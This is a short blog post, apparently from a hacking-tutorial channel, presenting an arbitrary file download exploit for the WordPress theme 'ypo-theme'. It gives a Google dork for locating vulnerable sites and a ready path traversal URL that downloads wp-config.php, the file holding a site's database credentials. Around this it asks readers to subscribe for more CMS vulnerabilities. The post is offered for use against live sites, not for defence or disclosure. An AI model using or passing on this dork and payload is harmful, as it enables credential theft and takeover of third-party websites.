Exploit Theme ypo-theme Vulnerabiliy Wordpress Site

        Exploit Theme ypo-theme Vulnerabiliy Wordpress

Hello everyone Today I wanna show you New Exploit Theme Wordpress Vulnerability

so you know ready about how to use it to Exploit and but for newbie you check my video Basic Exploit

in my Tutorial you should subcribe my channel youtube and Like my Page get more Vulnerability CMS Wordpress , Joomla , Drupal more .....

##############################################################
# Exploit Title: WordPress Theme ypo-theme Arbitrary File Download Vulnerability
# Dork : inurl:/wp-content/themes/ypo-theme/
# Date : 2016/07/25
# Tested on : Kali Linux 2
# Category: webapps
##############################################################
#
# http://www.site.com/wp-content/themes/ypo-theme/download.php?download=..%2F..%2F..%2F..%2Fwp-config.php
#############################################################

                    Video Demo Exploit Theme ypo-theme




Content us : Here  

Thank for visit I hope see you soon...............

Share this

Related Posts

Previous
Next Post »